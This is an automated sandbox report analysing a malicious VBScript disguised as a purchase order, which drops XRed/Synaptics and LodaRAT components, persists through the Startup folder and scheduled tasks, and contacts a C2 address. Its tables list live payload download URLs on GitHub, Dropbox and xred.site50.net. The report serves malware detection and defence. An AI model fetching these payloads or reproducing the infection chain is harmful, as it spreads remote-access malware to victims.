                                Source: XNLAGO.exe, 00000026.00000002.2343195604.000000000092E000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                                Source: XNLAGO.exe, 00000026.00000003.2309856177.00000000043C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81
                                Source: ._cache_update.exeBinary or memory string: WIN_XP
                                Source: XNLAGO.exe, 0000001E.00000003.1727574317.000000000483B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81|
                                Source: ._cache_update.exeBinary or memory string: WIN_XPe
                                Source: XNLAGO.exe, 00000022.00000003.1909121379.0000000004937000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81S
                                Source: ._cache_update.exeBinary or memory string: WIN_VISTA
                                Source: ._cache_update.exeBinary or memory string: WIN_7
                                Source: ._cache_update.exeBinary or memory string: WIN_8
                                Source: Yara matchFile source: Process Memory Space: ._cache_update.exe PID: 7704, type: MEMORYSTR

                                Remote Access Functionality

                                barindex
                                Yara detected LodaRAT
                                Source: Yara matchFile source: Process Memory Space: ._cache_update.exe PID: 7704, type: MEMORYSTR
                                Yara detected XRed
                                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                Source: Yara matchFile source: 8.0.update.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.3.wscript.exe.19411b43684.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000003.1311156718.0000019411790000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1307643273.0000019411A90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000000.1309629259.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1308437430.0000019411CC3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 400, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: update.exe PID: 7404, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 7744, type: MEMORYSTR
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXD42.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exe, type: DROPPED
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_001791DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,15_2_001791DC
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_001796E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,15_2_001796E2
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008D91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,22_2_008D91DC
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008D96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,22_2_008D96E2
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_001791DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,31_2_001791DC
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_001796E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,31_2_001796E2

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information631
                                Scripting                                		2
                                Valid Accounts                                		11
                                Windows Management Instrumentation                                		631
                                Scripting                                		1
                                Exploitation for Privilege Escalation                                		1
                                Disable or Modify Tools                                		11
                                Input Capture                                		2
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		4
                                Ingress Tool Transfer                                		Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomains1
                                Replication Through Removable Media                                		3
                                Native API                                		1
                                DLL Side-Loading                                		1
                                DLL Side-Loading                                		1
                                Deobfuscate/Decode Files or Information                                		LSASS Memory1
                                Peripheral Device Discovery                                		Remote Desktop Protocol11
                                Input Capture                                		11
                                Encrypted Channel                                		Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts1
                                Exploitation for Client Execution                                		2
                                Valid Accounts                                		1
                                Extra Window Memory Injection                                		31
                                Obfuscated Files or Information                                		Security Account Manager1
                                Account Discovery                                		SMB/Windows Admin Shares3
                                Clipboard Data                                		3
                                Non-Application Layer Protocol                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts1
                                Scheduled Task/Job                                		1
                                Scheduled Task/Job                                		2
                                Valid Accounts                                		11
                                Software Packing                                		NTDS4
                                File and Directory Discovery                                		Distributed Component Object ModelInput Capture314
                                Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchd121
                                Registry Run Keys / Startup Folder                                		21
                                Access Token Manipulation                                		1
                                DLL Side-Loading                                		LSA Secrets28
                                System Information Discovery                                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts112
                                Process Injection                                		1
                                Extra Window Memory Injection                                		Cached Domain Credentials1
                                Query Registry                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                                Scheduled Task/Job                                		12
                                Masquerading                                		DCSync161
                                Security Software Discovery                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job121
                                Registry Run Keys / Startup Folder                                		2
                                Valid Accounts                                		Proc Filesystem31
                                Virtualization/Sandbox Evasion                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
                                Virtualization/Sandbox Evasion                                		/etc/passwd and /etc/shadow3
                                Process Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                                Access Token Manipulation                                		Network Sniffing11
                                Application Window Discovery                                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd112
                                Process Injection                                		Input Capture1
                                System Owner/User Discovery                                		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582354 Sample: Purchase Order Summary Deta... Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 56 freedns.afraid.org 2->56 58 xred.mooo.com 2->58 60 3 other IPs or domains 2->60 72 Suricata IDS alerts for network traffic 2->72 74 Found malware configuration 2->74 76 Antivirus detection for URL or domain 2->76 80 20 other signatures 2->80 9 update.exe 1 5 2->9         started        12 wscript.exe 15 2->12         started        16 XNLAGO.exe 2->16         started        18 9 other processes 2->18 signatures3 78 Uses dynamic DNS services 56->78 process4 dnsIp5 46 C:\Users\user\AppData\...\._cache_update.exe, PE32 9->46 dropped 48 C:\ProgramData\Synaptics\Synaptics.exe, PE32 9->48 dropped 50 C:\ProgramData\Synaptics\RCXD42.tmp, PE32 9->50 dropped 20 Synaptics.exe 104 9->20         started        25 ._cache_update.exe 2 5 9->25         started        70 raw.githubusercontent.com 185.199.108.133, 443, 49699 FASTLYUS Netherlands 12->70 52 C:\Users\user\AppData\Roaming\...\update.exe, PE32 12->52 dropped 54 C:\Users\user\AppData\Local\...\JPS[1].exe, PE32 12->54 dropped 90 System process connects to network (likely due to code injection or exploit) 12->90 92 Benign windows process drops PE files 12->92 94 VBScript performs obfuscated calls to suspicious functions 12->94 100 2 other signatures 12->100 27 update.exe 12->27         started        96 Multi AV Scanner detection for dropped file 16->96 98 Machine Learning detection for dropped file 16->98 file6 signatures7 process8 dnsIp9 62 docs.google.com 142.250.185.78, 443, 49820, 49821 GOOGLEUS United States 20->62 64 drive.usercontent.google.com 142.250.186.161, 443, 49831, 49832 GOOGLEUS United States 20->64 66 freedns.afraid.org 69.42.215.252, 49828, 80 AWKNET-LLCUS United States 20->66 40 C:\Users\user\Documents\CZQKSDDMWR\~$cache1, PE32 20->40 dropped 82 Antivirus detection for dropped file 20->82 84 Multi AV Scanner detection for dropped file 20->84 86 Drops PE files to the document folder of the user 20->86 88 Machine Learning detection for dropped file 20->88 29 WerFault.exe 20->29         started        68 172.111.138.100, 49840, 49940, 50046 VOXILITYGB United States 25->68 42 C:\Users\user\AppData\Roaming\...\XNLAGO.exe, PE32 25->42 dropped 44 C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, ASCII 25->44 dropped 31 cmd.exe 1 25->31         started        34 wscript.exe 25->34         started        file10 signatures11 process12 signatures13 102 Uses schtasks.exe or at.exe to add and modify task schedules 31->102 36 conhost.exe 31->36         started        38 schtasks.exe 31->38         started        104 Windows Scripting host queries suspicious COM object (likely to drop second stage) 34->104 process14

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                Purchase Order Summary Details.vbs47%VirustotalBrowse
                                Purchase Order Summary Details.vbs32%ReversingLabsWin32.Trojan.Valyria

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Users\user\Documents\CZQKSDDMWR\~$cache1100%AviraTR/Dldr.Agent.SH
                                C:\Users\user\Documents\CZQKSDDMWR\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                                C:\ProgramData\Synaptics\RCXD42.tmp100%AviraTR/Dldr.Agent.SH
                                C:\ProgramData\Synaptics\RCXD42.tmp100%AviraW2000M/Dldr.Agent.17651006
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe100%AviraTR/Dldr.Agent.SH
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe100%AviraW2000M/Dldr.Agent.17651006
                                C:\Users\user\AppData\Local\Temp\BQQQVU.vbs100%AviraVBS/Runner.VPJI
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exe100%AviraTR/Dldr.Agent.SH
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exe100%AviraW2000M/Dldr.Agent.17651006
                                C:\ProgramData\Synaptics\Synaptics.exe100%AviraTR/Dldr.Agent.SH
                                C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe100%Joe Sandbox ML
                                C:\Users\user\Documents\CZQKSDDMWR\~$cache1100%Joe Sandbox ML
                                C:\ProgramData\Synaptics\RCXD42.tmp100%Joe Sandbox ML
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exe100%Joe Sandbox ML
                                C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                                C:\ProgramData\Synaptics\RCXD42.tmp92%ReversingLabsWin32.Worm.Zorex
                                C:\ProgramData\Synaptics\Synaptics.exe92%ReversingLabsWin32.Trojan.Synaptics
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exe92%ReversingLabsWin32.Trojan.Synaptics
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe68%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe92%ReversingLabsWin32.Trojan.Synaptics
                                C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe68%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\Documents\CZQKSDDMWR\~$cache192%ReversingLabsWin32.Worm.Zorex

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                https://drive.us0%Avira URL Cloudsafe
                                http://xred.site50.net/syn/SUpdate.ini0$100%Avira URL Cloudmalware
                                http://xred.site50.net/syn/SSLLibrary.dl100%Avira URL Cloudmalware
                                http://crl.mib0%Avira URL Cloudsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                freedns.afraid.org
                                		69.42.215.252
                                		truefalse
                                  		high
                                  docs.google.com
                                  		142.250.185.78
                                  		truefalse
                                    		high
                                    raw.githubusercontent.com
                                    		185.199.108.133
                                    		truefalse
                                      		high
                                      drive.usercontent.google.com
                                      		142.250.186.161
                                      		truefalse
                                        		high
                                        xred.mooo.com
                                        		unknown
                                        		unknownfalse
                                          		high

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          xred.mooo.comfalse
                                            		high
                                            https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/JPS.exefalse
                                              		high
                                              http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                                		high

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://raw.githubusercontent.com/)wscript.exe, 00000000.00000002.1312382254.000001940EFC9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310308003.000001940EFC3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310253929.000001940EFA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://docs.google.com/6Smr;Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/JPS.exe/wscript.exe, 00000000.00000003.1310699131.000001940EF41000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312257308.000001940EF43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310598692.000001940EF3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://xred.site50.net/syn/Synaptics.rarZSynaptics.exe, 00000010.00000002.2213454335.00000000021A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.drfalse
                                                          		high
                                                          http://crl.mibSynaptics.exe, 00000010.00000002.2215408507.0000000004E28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://docs.google.com/4Synaptics.exe, 00000010.00000002.2296543685.000000001D60F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://xred.site50.net/syn/SUpdate.ini0$update.exe, 0000000E.00000003.1438685808.0000000002240000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978OSynaptics.exe, 00000010.00000002.2211766552.0000000000675000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://docs.google.com/...Synaptics.exe, 00000010.00000002.2299504453.000000001D6AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://drive.usSynaptics.exe, 00000010.00000002.2299504453.000000001D6AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:Synaptics.exe, 00000010.00000002.2213454335.00000000021A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://drive.usercontent.google.com/Synaptics.exe, 00000010.00000002.2215408507.0000000004DA0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://xred.site50.net/syn/Synaptics.rarSynaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.drfalse
                                                                      		high
                                                                      https://docs.google.com/INKrSynaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/mainwscript.exe, wscript.exe, 00000000.00000002.1312536779.00000194110E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312928343.0000019411EC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312434862.000001940F275000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978/TSynaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://drive.usercontent.google.com/:USynaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://docs.google.com/Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2299504453.000000001D6AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://docs.google.com/google.com/Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://raw.githubusercontent.com/wscript.exe, 00000000.00000002.1312382254.000001940EFC9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310308003.000001940EFC3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310253929.000001940EFA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://xred.site50.net/syn/SSLLibrary.dlupdate.exe, 0000000E.00000003.1438685808.0000000002240000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    http://xred.site50.net/syn/SSLLibrary.dll6Synaptics.exe, 00000010.00000002.2213454335.00000000021A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:Synaptics.exe, 00000010.00000002.2213454335.00000000021A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.drfalse
                                                                                          		high
                                                                                          https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~DF16C6BEDBEDB6C577.TMP.18.dr, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.drfalse
                                                                                            		high
                                                                                            https://drive.usercontent.google.com/LUSynaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000010.00000002.2213454335.00000000021A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://xred.site50.net/syn/SUpdate.iniSynaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.drfalse
                                                                                                  		high
                                                                                                  https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/JPS.exeyzwscript.exe, 00000000.00000003.1311634064.00000194116A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312583846.00000194116A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://raw.githubusercontent.com/Xwscript.exe, 00000000.00000003.1311634064.00000194116B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312583846.00000194116B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16Synaptics.exe, 00000010.00000002.2213454335.00000000021A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/JPS.exepKwscript.exe, 00000000.00000002.1312554054.0000019411690000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/JPS.exeupwscript.exe, 00000000.00000003.1310699131.000001940EF41000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312257308.000001940EF43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310598692.000001940EF3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://ip-score.com/checkip/rentControlSet._cache_update.exe, 0000000F.00000002.2555338528.0000000001776000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://docs.google.com/uc?id=0;Synaptics.exe, 00000010.00000002.2246970703.000000000C23E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2269548547.000000001163E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2331551344.000000002713E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2285525995.00000000193FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2274954141.000000001417E000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=Dupdate.exe, 0000000E.00000003.1438685808.0000000002240000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/JPS.exelzwscript.exe, 00000000.00000003.1311634064.00000194116A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312583846.00000194116A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://docs.google.com/uc?id=0BxsMXGSynaptics.exe, 00000010.00000002.2252749844.000000000E67E000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/JPS.exeMzwscript.exe, 00000000.00000003.1311634064.00000194116A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312583846.00000194116A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://xred.site50.net/syn/SSLLibrary.dllSynaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.drfalse
                                                                                                                          		high
                                                                                                                          https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlupdate.exe, 0000000E.00000003.1438685808.0000000002240000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            		high

                                                                                                                            World Map of Contacted IPs

                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs

                                                                                                                            Public IPs

                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            142.250.185.78
                                                                                                                            		docs.google.comUnited States
                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                            142.250.186.161
                                                                                                                            		drive.usercontent.google.comUnited States
                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                            185.199.108.133
                                                                                                                            		raw.githubusercontent.comNetherlands
                                                                                                                            		54113FASTLYUSfalse
                                                                                                                            172.111.138.100
                                                                                                                            		unknownUnited States
                                                                                                                            		3223VOXILITYGBtrue
                                                                                                                            69.42.215.252
                                                                                                                            		freedns.afraid.orgUnited States
                                                                                                                            		17048AWKNET-LLCUSfalse

                                                                                                                            General Information

                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                            Analysis ID:1582354
                                                                                                                            Start date and time:2024-12-30 11:46:42 +01:00
                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                            Overall analysis duration:0h 10m 40s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Cookbook file name:default.jbs
                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                            Number of analysed new started processes analysed:39
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:1
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Sample name:Purchase Order Summary Details.vbs
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal100.troj.adwa.expl.evad.winVBS@26/77@14/5
                                                                                                                            EGA Information:
                                                                                                                            • Successful, ratio: 100%
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 100%
                                                                                                                            • Number of executed functions: 88
                                                                                                                            • Number of non-executed functions: 279
                                                                                                                            Cookbook Comments:
                                                                                                                            • Found application associated with file extension: .vbs

                                                                                                                            Warnings

                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                            • Excluded IPs from analysis (whitelisted): 52.109.32.97, 184.28.90.27, 52.113.194.132, 52.168.117.175, 20.189.173.21, 13.107.246.45, 20.109.210.53, 20.190.159.2
